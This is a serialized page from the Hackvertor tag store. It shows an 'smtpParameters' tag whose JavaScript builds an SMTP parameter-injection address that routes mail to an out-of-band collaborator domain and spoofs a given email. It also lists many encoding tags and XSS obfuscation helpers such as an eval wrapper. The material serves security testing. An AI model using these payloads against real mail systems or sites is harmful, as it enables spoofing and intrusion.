6:["$","div",null,{"className":"flex flex-col lg:flex-row","children":["$","div",null,{"children":[["$","div",null,{"className":"grid grid-cols-1 md:grid-cols-2 xl:grid-cols-2 gap-3","children":[["$","div",null,{"children":[["$","div",null,{"className":"mb-4","children":[["$","h1",null,{"className":"text-3xl font-bold break-words tracking-tight","children":"smtpParameters"}],["$","div",null,{"className":"flex flex-wrap items-center gap-2 mt-2 text-sm text-base-content/70","children":[["$","span",null,{"className":"badge badge-outline","children":"Email"}],["$","span",null,{"className":"badge badge-primary","children":"Built-in"}],["$","span",null,{"children":"•"}],["$","span",null,{"children":["1"," installs"]}],["$","span",null,{"children":"•"}],["$","span",null,{"children":["119"," views"]}]]}]]}],["$","p",null,{"className":"text-base-content/80 break-words leading-relaxed mb-6","children":"This tag creates a SMTP parameter attack. I've found this attack on a live target. The parameters specify your collaborator payload and domain. The input should contain the email you want to spoof."}],["$","div",null,{"className":"flex items-center gap-3 mb-6 p-3 bg-base-200 rounded-lg w-fit","children":[["$","div",null,{"className":"avatar","children":["$","div",null,{"className":"w-10 rounded-full","children":["$","$L13",null,{"src":"https://avatars.githubusercontent.com/u/1217702?v=4","width":40,"height":40,"alt":"hackvertor","className":"rounded-full"}]}]}],["$","div",null,{"className":"flex flex-col","children":[["$","span",null,{"className":"text-xs text-base-content/60 uppercase tracking-wide","children":"Created by"}],["$","$L12","66ce102d5ff32784eaefa4b9",{"href":"/profile?id=66ce102d5ff32784eaefa4b9","className":"link link-hover font-semibold","children":"hackvertor"}]]}],null]}],["$","div",null,{"className":"flex flex-wrap gap-4 text-sm text-base-content/70 mb-6","children":[["$","div",null,{"className":"flex items-center gap-2","children":[["$","svg",null,{"xmlns":"http://www.w3.org/2000/svg","className":"h-4 w-4","fill":"none","viewBox":"0 0 24 24","stroke":"currentColor","children":["$","path",null,{"strokeLinecap":"round","strokeLinejoin":"round","strokeWidth":2,"d":"M8 7V3m8 4V3m-9 8h10M5 21h14a2 2 0 002-2V7a2 2 0 00-2-2H5a2 2 0 00-2 2v12a2 2 0 002 2z"}]}],["$","span",null,{"children":["Created"," ","Sep 10, 2025"]}]]}],["$","div",null,{"className":"flex items-center gap-2","children":[["$","svg",null,{"xmlns":"http://www.w3.org/2000/svg","className":"h-4 w-4","fill":"none","viewBox":"0 0 24 24","stroke":"currentColor","children":["$","path",null,{"strokeLinecap":"round","strokeLinejoin":"round","strokeWidth":2,"d":"M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15"}]}],["$","span",null,{"children":["Updated"," ","Sep 10, 2025"]}]]}]]}],["$","div",null,{"className":"space-y-4","children":["$","div",null,{"className":"flex flex-wrap items-center gap-2","children":[["$","button",null,{"type":"button","className":"btn btn-secondary","disabled":true,"children":[["$","svg",null,{"xmlns":"http://www.w3.org/2000/svg","className":"h-4 w-4","fill":"none","viewBox":"0 0 24 24","stroke":"currentColor","children":["$","path",null,{"strokeLinecap":"round","strokeLinejoin":"round","strokeWidth":2,"d":"M11 5H6a2 2 0 00-2 2v11a2 2 0 002 2h11a2 2 0 002-2v-5m-1.414-9.414a2 2 0 112.828 2.828L11.828 15H9v-2.828l8.586-8.586z"}]}],"Edit"]}],["$","$L12",null,{"href":"/tag-store/new/?id=68c1d9d2fbe937e7abdb768a","children":["$","button",null,{"type":"button","className":"btn btn-secondary","children":[["$","svg",null,{"xmlns":"http://www.w3.org/2000/svg","className":"h-4 w-4","fill":"none","viewBox":"0 0 24 24","stroke":"currentColor","children":["$","path",null,{"strokeLinecap":"round","strokeLinejoin":"round","strokeWidth":2,"d":"M8 16H6a2 2 0 01-2-2V6a2 2 0 012-2h8a2 2 0 012 2v2m-6 12h8a2 2 0 002-2v-8a2 2 0 00-2-2h-8a2 2 0 00-2 2v8a2 2 0 002 2z"}]}],"Fork"]}]}],null,false]}]}]]}],["$","div",null,{"children":[["$","div",null,{"className":"bg-base-200 rounded-lg p-4 mb-5","children":["$","div",null,{"className":"flex flex-wrap gap-3 lg:grid lg:grid-cols-2 justify-items-start","children":[["$","div",null,{"className":"flex flex-col","children":[["$","span",null,{"className":"text-xs text-base-content/60 uppercase tracking-wide mb-1","children":"Category"}],["$","span",null,{"className":"badge badge-primary","children":"Email"}]]}],["$","div",null,{"className":"flex flex-col","children":[["$","span",null,{"className":"text-xs text-base-content/60 uppercase tracking-wide mb-1","children":"Self-closing"}],["$","span",null,{"className":"badge badge-primary","children":"No"}]]}],["$","div",null,{"className":"flex flex-col","children":[["$","span",null,{"className":"text-xs text-base-content/60 uppercase tracking-wide mb-1","children":"Type"}],["$","span",null,{"className":"badge badge-primary","children":"Built-in"}]]}]]}]}],["$","div",null,{"className":"mb-5","children":["Arguments:",["$","br",null,{}],["$","$L15",null,{"code":"[\n {\n \"type\": \"string\",\n \"help\": \"This is your collaborator payload\",\n \"defaultValue\": \"collab\"\n },\n {\n \"type\": \"string\",\n \"help\": \"This is your collaborator domain\",\n \"defaultValue\": \"oastify.com\"\n }\n]","language":"json","maxHeight":"250px"}]]}]]}]]}],["$","div",null,{"className":"mt-5","children":["Code:",["$","br",null,{}],["$","$L15",null,{"code":"class smtpParameters {\r\n encode(input, collaboratorPayload, collaborator) {\r\n let[user,domain] = input.split(\"@\");\r\n return `\"${collaboratorPayload}\\\\\"@${collaborator}> ORCPT=test;${user}\"@${domain}`;\r\n }\r\n}\r\n","language":"javascript","maxHeight":"600px"}]]}],["$","div",null,{"className":"mt-5 border-t border-slate-700 p-5","children":["$","$L16",null,{"tagId":"68c1d9d2fbe937e7abdb768a","tagName":"smtpParameters","tag":{"id":"68c1d9d2fbe937e7abdb768a","name":"smtpParameters","arguments":[{"type":"string","help":"This is your collaborator payload","defaultValue":"collab"},{"type":"string","help":"This is your collaborator domain","defaultValue":"oastify.com"}],"code":"class smtpParameters {\r\n encode(input, collaboratorPayload, collaborator) {\r\n let[user,domain] = input.split(\"@\");\r\n return `\"${collaboratorPayload}\\\\\"@${collaborator}> ORCPT=test;${user}\"@${domain}`;\r\n }\r\n}\r\n","category":"Email","description":"This tag creates a SMTP parameter attack. I've found this attack on a live target. The parameters specify your collaborator payload and domain. The input should contain the email you want to spoof.","viewed":0,"installed":0,"tagId":155,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T20:04:34.359Z","updatedAt":"$D2025-09-10T20:04:34.359Z","User":{"id":"66ce102d5ff32784eaefa4b9","name":"Gareth Heyes","username":"hackvertor","image":"https://avatars.githubusercontent.com/u/1217702?v=4"}},"allTags":[{"id":"66e325a0e10e0e8baa87ecf4","name":"base64","arguments":[],"code":"class base64 {\r\n encode(input) {\r\n return btoa(input);\r\n }\r\n\r\n decode(input) {\r\n return atob(input);\r\n }\r\n\r\n startsWith(input) {\r\n const base64Regex =\r\n /^(?:(?:[A-Za-z0-9+/]{8,}={0,2}$)|[A-Za-z0-9+/]{8,}={0,2})/;\r\n const result = base64Regex.exec(input);\r\n if (result && result[0].length % 4 === 0) {\r\n return result;\r\n } else {\r\n return null;\r\n }\r\n }\r\n\r\n matches(input) {\r\n const base64Regex =\r\n /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;\r\n const result = base64Regex.exec(input);\r\n if (result && result[0].length % 4 === 0) {\r\n return result;\r\n } else {\r\n return null;\r\n }\r\n }\r\n}\r\n","category":"Convert","description":"This tag encodes and decodes base64 using browser APIs atob and btoa.","viewed":965,"installed":0,"tagId":1,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-12T17:32:16.981Z","updatedAt":"$D2026-02-03T21:41:52.701Z"},{"id":"66e36580e10e0e8baa87ed01","name":"toCodePoint","arguments":[],"code":"class toCodePoint {\n encode(input) {\n return input.split('').map(chr => chr.codePointAt().toString()).join(',');\n }\n}\n","category":"String","description":"Splits the input into an array then calls codePointAt","viewed":879,"installed":0,"tagId":2,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-12T22:04:48.108Z","updatedAt":"$D2025-05-30T21:37:26.591Z"},{"id":"66e37652451c69ed89ea9087","name":"fromCodePoint","arguments":[],"code":"class fromCodePoint {\r\n encode(input) {\r\n return input\r\n .split(\",\")\r\n .map((chrNum) => String.fromCodePoint(parseInt(chrNum)))\r\n .join(\"\");\r\n }\r\n}\r\n","category":"String","description":"Splits the input into an array then calls String.fromCodePoint","viewed":823,"installed":0,"tagId":3,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-12T23:16:34.347Z","updatedAt":"$D2025-05-30T21:37:27.489Z"},{"id":"66e3e69e7199bb272d1236cc","name":"js","arguments":[],"code":"class js {\n encode(input) {\n try {\n return String(eval(input));\n } catch(e){\n return String(e);\n }\n }\n}\n","category":"Convert","description":"This tag executes JavaScript","viewed":888,"installed":0,"tagId":4,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-13T07:15:42.665Z","updatedAt":"$D2025-05-30T21:37:26.899Z"},{"id":"66e61eaea516e147df998746","name":"unicodeOverflow","arguments":[{"type":"number","help":"This specifies a mask to use to create the overflow. Mask is simply a number that when combined with the character creates an overflow.","defaultValue":"0x100"}],"code":"class unicodeOverflow {\r\n encode(input, mask) {\r\n return input.split('').map(chr =>\r\n String.fromCodePoint(mask + chr.codePointAt())).join('');\r\n }\r\n}","category":"Email","description":"This creates a unicode overflow that is described in my research:\r\nhttps://portswigger.net/research/splitting-the-email-atom","viewed":838,"installed":0,"tagId":14,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-14T23:39:26.718Z","updatedAt":"$D2025-09-10T19:53:19.912Z"},{"id":"66e88ec2aba4c57cb2f61700","name":"autodecode","arguments":[],"code":"class autodecode {\n decode(input) {\n throw new Error(\"This tag is a placeholder tag. If you want to autodecode from the API use hv.autodecode()\");\n }\n}\n","category":"Convert","description":"This tag attempts to detect and decode layers of encoding.","viewed":200,"installed":0,"tagId":15,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-16T20:02:10.764Z","updatedAt":"$D2025-05-25T13:45:22.982Z"},{"id":"66e89337aba4c57cb2f61702","name":"sha","arguments":[{"type":"quotelessString","help":"This argument chooses the hash algorithm to use: SHA-1, SHA-256, SHA-384, SHA-512","defaultValue":"SHA-256"}],"code":"class sha {\n async encode(input, algo) {\n const encoder = new TextEncoder();\n const data = encoder.encode(input);\n const hashBuffer = await crypto.subtle.digest(algo, data);\n const hashArray = Array.from(new Uint8Array(hashBuffer)); \n const hashHex = hashArray.map(b => b.toString(16).padStart(2, '0')).join(''); \n return hashHex;\n }\n}\n","category":"Hash","description":"This tag uses the browsers crypto API to perform a hash operation using various algorithms","viewed":134,"installed":0,"tagId":16,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-16T20:21:11.220Z","updatedAt":"$D2025-05-25T13:45:48.168Z"},{"id":"66e96c13c4798f0ace131ffc","name":"utf7","arguments":[{"type":"string","help":"Provides a prefix","defaultValue":"&"}],"code":"class utf7 {\r\n encode(input, prefix) {\r\n return prefix + btoa(input.replaceAll(/(.)/g,\"\\x00$1\"))\r\n .replaceAll(/=+$/g,\"\") + \"-\";\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/[+&]([a-zA-Z0-9]+)-/g, ($0, match) => atob(match).replaceAll(/[\\x00&-]/g,\"\"));\r\n }\r\n\r\n startsWith(input) {\r\n return /^[&+][a-zA-Z0-9]{3,}-/.exec(input);\r\n }\r\n \r\n matches(input) {\r\n return /^[&+][a-zA-Z0-9]{3,}-$/.exec(input);\r\n }\r\n}\r\n","category":"Charsets","description":"This encodes and decodes UTF-7 used in browsers and email parsers.","viewed":789,"installed":0,"tagId":18,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-17T11:46:27.976Z","updatedAt":"$D2026-02-02T20:04:04.040Z"},{"id":"66e970afc4798f0ace131ffe","name":"encodedWordMeta","arguments":[{"type":"string","help":"Provides a charset","defaultValue":"iso-8859-1"},{"type":"quotelessString","help":"Provides a encoding type: q or b is supported","defaultValue":"q"}],"code":"class encodedWordMeta {\r\n encode(input, charset, type) {\r\n return `=?${charset}?${type}?${input}?=`;\r\n }\r\n}","category":"Email","description":"This tag creates the meta data required for encoded word in email parsing attacks. You can read more about it here:\r\nhttps://portswigger.net/research/splitting-the-email-atom","viewed":770,"installed":0,"tagId":19,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-17T12:06:07.077Z","updatedAt":"$D2025-05-30T21:37:27.996Z"},{"id":"66e971e0c4798f0ace132000","name":"unicodeOverflowVariations","arguments":[{"type":"number","help":"Provides the maximum codepoint","defaultValue":"0xfff"}],"code":"class unicodeOverflowVariations {\r\n encode(input, max) {\r\n if(max > 0xffff) {\r\n throw new Error(\"Max parameter is too large\");\r\n }\r\n return input.split('').map(chr => {\r\n\tlet characters = '';\r\n\tfor(let i=chr.codePointAt()+1;i<=max;i++){\r\n\t\tif(i % 256 === chr.codePointAt()) {\r\n\t\t\tcharacters += String.fromCodePoint(i);\r\n\t\t}\r\n\t}\r\n\treturn characters;}).join('');\r\n }\r\n}\r\n","category":"Email","description":"This tag generates multiple variations of unicode overflows.","viewed":105,"installed":0,"tagId":20,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-17T12:11:12.908Z","updatedAt":"$D2025-09-10T19:52:46.760Z"},{"id":"66e97482c4798f0ace132002","name":"encodedWord","arguments":[],"code":"class encodedWord {\r\n encode(input) {\r\n return input.split('').map(chr => '=' + chr.codePointAt().toString(16).padStart(2, '0')).join('')\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/=[a-fA-F0-9]{2}/gi, function(hex){\r\n return String.fromCodePoint(parseInt(hex.replaceAll(\"=\",\"\"),16));\r\n });\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:=[a-fA-F0-9]{2})+/.exec(input);\r\n }\r\n \r\n matches(input) {\r\n return /^(?:=[a-fA-F0-9]{2})+$/.exec(input);\r\n }\r\n}\r\n","category":"Email","description":"Encodes and decode encoded word.","viewed":117,"installed":0,"tagId":21,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-17T12:22:26.676Z","updatedAt":"$D2026-02-04T19:16:32.387Z"},{"id":"66ed5850166db3bed7277f14","name":"url","arguments":[],"code":"class url {\r\n encode(input) {\r\n return encodeURIComponent(input);\r\n }\r\n\r\n decode(input) {\r\n return decodeURIComponent(input);\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:%[a-f0-9]{2})+/i.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:%[a-f0-9]{2})+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag does URL encode and decode","viewed":101,"installed":0,"tagId":23,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-20T11:11:12.410Z","updatedAt":"$D2026-02-04T21:02:29.810Z"},{"id":"66ed5c6d901b6830a993c403","name":"unicode","arguments":[],"code":"class unicode {\r\n encode(input) {\r\n return input.split('').map(chr => \"\\\\u\"+chr.charCodeAt(0).toString(16).padStart(4, \"0\")).join('');\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/\\\\u([a-fA-F0-9]{4})/g,($0,hex) => String.fromCharCode(parseInt(hex,16)));\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:\\\\u[a-fA-F0-9]{4})+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:\\\\u[a-fA-F0-9]{4})+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag provides unicode escapes and decoding","viewed":100,"installed":0,"tagId":24,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-20T11:28:45.513Z","updatedAt":"$D2026-02-02T20:08:51.058Z"},{"id":"66f00ae8e9597eb8307e607c","name":"unicodeEs6","arguments":[],"code":"class unicodeEs6 {\r\n encode(input) {\r\n return input.split('').map(chr => \"\\\\u{\"+chr.codePointAt(0).toString(16)+\"}\").join('');\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/\\\\u[{]([0]*[a-fA-F0-9]{1,6})[}]/g,($0,hex) => String.fromCodePoint(parseInt(hex,16)));\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:\\\\u[{][0]*[a-fA-F0-9]{1,6}[}])+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:\\\\u[{][0]*[a-fA-F0-9]{1,6}[}])+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag provides ES6 unicode escapes and decoding","viewed":98,"installed":0,"tagId":25,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-22T12:17:44.138Z","updatedAt":"$D2026-02-02T20:09:28.734Z"},{"id":"66f14e77d35eae1a0c139c9a","name":"hexEscape","arguments":[],"code":"class hexEscape {\r\n encode(input) {\r\n return input.split('').map(chr => chr.charCodeAt(0) <= 0xff ? \"\\\\x\"+chr.charCodeAt(0).toString(16).padStart(2, \"0\"):chr).join('');\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/\\\\x([a-fA-F0-9]{2})/g,($0,hex) => String.fromCharCode(parseInt(hex,16)));\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:\\\\x[a-fA-F0-9]{2})+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:\\\\x[a-fA-F0-9]{2})+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag provides hex escapes and decoding","viewed":99,"installed":0,"tagId":26,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-23T11:18:15.390Z","updatedAt":"$D2026-02-02T20:11:50.108Z"},{"id":"66f2a164a533aeaa2f2cd400","name":"evalFromCodePoint","arguments":[],"code":"class evalFromCodePoint {\n encode(input) {\n return \"eval(String.fromCodePoint(\" + input.split('').map(chr => chr.codePointAt()).join(',')+\"))\"\n }\n}\n","category":"XSS","description":"This tag converts every character into it's code point and then wraps it in an eval.","viewed":89,"installed":0,"tagId":27,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-24T11:24:20.942Z","updatedAt":"$D2025-05-22T18:49:43.629Z"},{"id":"66f2a357a948422a69c883a6","name":"binary","arguments":[],"code":"class binary {\r\n encode(input) {\r\n return input.split('').map(chr => chr.codePointAt(0).toString(2).padStart(8, \"0\")).join(' ')\r\n }\r\n\r\n decode(input) {\r\n return input.split(\" \").map(bin => String.fromCodePoint(parseInt(bin,2))).join('')\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:(?:[10]){8}\\s?)+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:(?:[10]){8}\\s?)+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag converts ascii to binary","viewed":86,"installed":0,"tagId":28,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-24T11:32:39.890Z","updatedAt":"$D2026-02-02T20:12:45.686Z"},{"id":"66f2a54b343d8cfcd56c1559","name":"replaceAll","arguments":[{"type":"string","help":"This is used to find the string","defaultValue":"find"},{"type":"string","help":"This is used to replace the string","defaultValue":"replace"}],"code":"class replaceAll {\r\n encode(input, find, replace) {\r\n return input.replaceAll(find, replace);\r\n }\r\n}\r\n","category":"String","description":"This tag does a string replace all without a regex.","viewed":86,"installed":0,"tagId":29,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-24T11:40:59.053Z","updatedAt":"$D2025-05-22T18:49:43.623Z"},{"id":"66f2a5ba18488a4e5df0e867","name":"replaceAllRegex","arguments":[{"type":"string","help":"This is used to find the string","defaultValue":"regex"},{"type":"string","help":"This is used to replace the string","defaultValue":"replace"}],"code":"class replaceAllRegex {\n encode(input, regex, replace) {\n return input.replaceAll(new RegExp(regex,\"g\"), replace);\n }\n}\n","category":"String","description":"This tag does a string replace all with a regex.","viewed":76,"installed":0,"tagId":30,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-24T11:42:50.507Z","updatedAt":"$D2025-05-22T18:49:44.864Z"},{"id":"66f3222cb7f07aed7de8a1f7","name":"repeat","arguments":[{"type":"number","help":"This is the amount to repeat","defaultValue":"0xff"}],"code":"class repeat {\r\n encode(input, amount) {\r\n return input.repeat(amount);\r\n }\r\n}\r\n","category":"String","description":"This tag repeats the input the number of times in the amount argument","viewed":76,"installed":0,"tagId":31,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-24T20:33:48.192Z","updatedAt":"$D2025-05-22T18:49:44.865Z"},{"id":"66f3b77abc888fa76320499b","name":"fullWidth","arguments":[],"code":"class fullWidth {\r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((char) => {\r\n const code = char.charCodeAt(0);\r\n if (code >= 33 && code <= 126) {\r\n return String.fromCharCode(code + 0xfee0);\r\n }\r\n return char;\r\n })\r\n .join(\"\");\r\n }\r\n}","category":"Convert","description":"This converts ascii characters into their full width forms.","viewed":70,"installed":0,"tagId":32,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-25T07:10:50.869Z","updatedAt":"$D2025-05-25T17:29:36.882Z"},{"id":"66f47d6d6a18fd403e3b9cc6","name":"range","arguments":[{"type":"number","help":"This provides the start number","defaultValue":"0"},{"type":"number","help":"This provides the end number","defaultValue":"0xff"}],"code":"class range {\r\n encode(input, min, max) {\r\n return Array.from({ length: max - min + 1 }, (_, i) => min + i);\r\n }\r\n}\r\n","category":"Math","description":"This creates a range of numbers","viewed":63,"installed":0,"tagId":33,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-25T21:15:25.846Z","updatedAt":"$D2025-05-25T17:29:35.975Z"},{"id":"66f50bac93f8b543a9ce3d02","name":"unicodeNormalization","arguments":[],"code":"class unicodeNormalization {\r\n encode(input) {\r\n let output = [];\r\n const unicodeCharacterCodes = Array.from(\r\n { length: 0x10ffff - 0x7f },\r\n (_, i) => i + 0x7f + 1,\r\n );\r\n const normalizationForms = [\"NFKC\", \"NFC\", \"NFD\", \"NFKD\"];\r\n unicodeCharacterCodes.forEach((code) =>\r\n normalizationForms.forEach((form) => {\r\n const chr = String.fromCodePoint(code);\r\n const normalized = chr.normalize(form);\r\n let chunk = [];\r\n for (let i = 0; i < input.length; i++) {\r\n if (input[i] === normalized) {\r\n chunk.push(chr);\r\n }\r\n }\r\n if (chunk.length) output.push(chunk.join(\"\"));\r\n }),\r\n );\r\n return output.join(\"\");\r\n }\r\n}\r\n","category":"Charsets","description":"This tag performs normalization on every unicode character using each normalization form. Then loops through the input and compares the normalized form to the input and replaces the input with the unicode character that transforms to it.","viewed":69,"installed":0,"tagId":34,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-09-26T07:22:20.079Z","updatedAt":"$D2025-05-25T17:29:36.955Z"},{"id":"66fee84bf460d5036dbe71e5","name":"dec","arguments":[],"code":"class dec {\r\n encode(input) {\r\n return input.split('').map(chr => '&#'+chr.codePointAt()+';').join('');\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/&#\\d+;/gi, c => String.fromCodePoint(parseInt(c.replaceAll(/[&#;]/g,''))));\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:&#\\d+;?)+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:&#\\d+;?)+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"Converts decimal entities","viewed":67,"installed":0,"tagId":35,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-03T18:54:03.738Z","updatedAt":"$D2026-02-02T20:14:12.186Z"},{"id":"66fee988f460d5036dbe71e7","name":"hex","arguments":[{"type":"string","help":"This provides the prefix","defaultValue":"&#x"},{"type":"string","help":"This provides the suffix","defaultValue":";"}],"code":"class hex {\r\n encode(input, prefix = \"&#x\", suffix = \";\") {\r\n return input\r\n .split(\"\")\r\n .map(\r\n (chr) =>\r\n prefix + chr.codePointAt().toString(16).padStart(2, \"0\") + suffix,\r\n )\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/&#x[a-fA-F0-9]+;?/gi, (c) =>\r\n String.fromCodePoint(parseInt(c.replaceAll(/[&#;x]/g, \"\"), 16)),\r\n );\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:&#x[a-fA-F0-9]+;?)+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:&#x[a-fA-F0-9]+;?)+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"Converts hex entities","viewed":68,"installed":0,"tagId":36,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-03T18:59:20.584Z","updatedAt":"$D2026-02-02T22:10:40.177Z"},{"id":"66ff0904f460d5036dbe71ea","name":"html","arguments":[],"code":"class html {\r\n encode(input) {\r\n const keys = Object.keys(hv.variables.htmlEntities).reverse();\r\n return input\r\n .split(\"\")\r\n .map((chr) => {\r\n if (chr === \"<\") {\r\n return \"<\";\r\n }\r\n if (chr === \">\") {\r\n return \">\";\r\n }\r\n const entity = keys.find(\r\n (key) => hv.variables.htmlEntities[key] === chr.codePointAt(),\r\n );\r\n return entity ? \"&\" + entity + \";\" : chr;\r\n })\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n const textarea = document.createElement(\"textarea\");\r\n textarea.innerHTML = input;\r\n return textarea.value;\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:&[a-zA-Z]{1,20};)+/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:&[a-zA-Z]{1,20};)+$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag HTML encodes and decodes.","viewed":72,"installed":0,"tagId":37,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-03T21:13:40.070Z","updatedAt":"$D2026-02-02T20:21:03.737Z"},{"id":"670449582a2117a17fd163ae","name":"setVariable","arguments":[{"type":"string","help":"This is the name of the argument","defaultValue":"foo"}],"code":"class setVariable {\r\n encode(input, name) {\r\n hv.variables[name] = input;\r\n return input;\r\n }\r\n}\r\n","category":"Variables","description":"This tag sets a variable that can be used by other Hackvertor tags.","viewed":61,"installed":0,"tagId":42,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T20:49:28.976Z","updatedAt":"$D2025-06-23T19:04:59.796Z"},{"id":"670449c42a2117a17fd163b0","name":"getVariable","arguments":[{"type":"string","help":"This is the name of the variable","defaultValue":"foo"}],"code":"class getVariable {\r\n encode(input, name) {\r\n return hv.variables[name];\r\n }\r\n}\r\n","category":"Variables","description":"This tag gets a Hackvertor variable","viewed":53,"installed":0,"tagId":43,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T20:51:16.021Z","updatedAt":"$D2025-05-25T17:29:42.955Z"},{"id":"6704515b5662138fcd5e0b07","name":"cdata","arguments":[],"code":"class cdata {\r\n encode(input, arg1) {\r\n return (\r\n \"\"\r\n );\r\n }\r\n}\r\n","category":"XSS","description":"This tag performs a crazy obfuscation using CDATA tags.","viewed":57,"installed":0,"tagId":44,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T21:23:39.352Z","updatedAt":"$D2025-05-25T17:29:42.956Z"},{"id":"670453dc5f355a622e7be807","name":"reverse","arguments":[],"code":"class reverse {\r\n encode(input) {\r\n return input.split('').reverse().join('');\r\n }\r\n}\r\n","category":"String","description":"This tag reverses the input","viewed":51,"installed":0,"tagId":45,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T21:34:20.139Z","updatedAt":"$D2025-05-25T17:29:43.656Z"},{"id":"670455157aa1b40e0dd71f81","name":"find","arguments":[{"type":"string","help":"This is the regular expression used","defaultValue":"regexp"},{"type":"string","help":"This is the regular expression flags","defaultValue":"gim"}],"code":"class find {\r\n encode(input, regex, flags) {\r\n return input.match(new RegExp(regex, flags));\r\n }\r\n}\r\n","category":"String","description":"This tag uses a regex to find data in the input.","viewed":38,"installed":0,"tagId":46,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T21:39:33.062Z","updatedAt":"$D2025-05-25T17:29:43.749Z"},{"id":"6704569e431160e18d5e0ff7","name":"unique","arguments":[],"code":"class unique {\n encode(input) 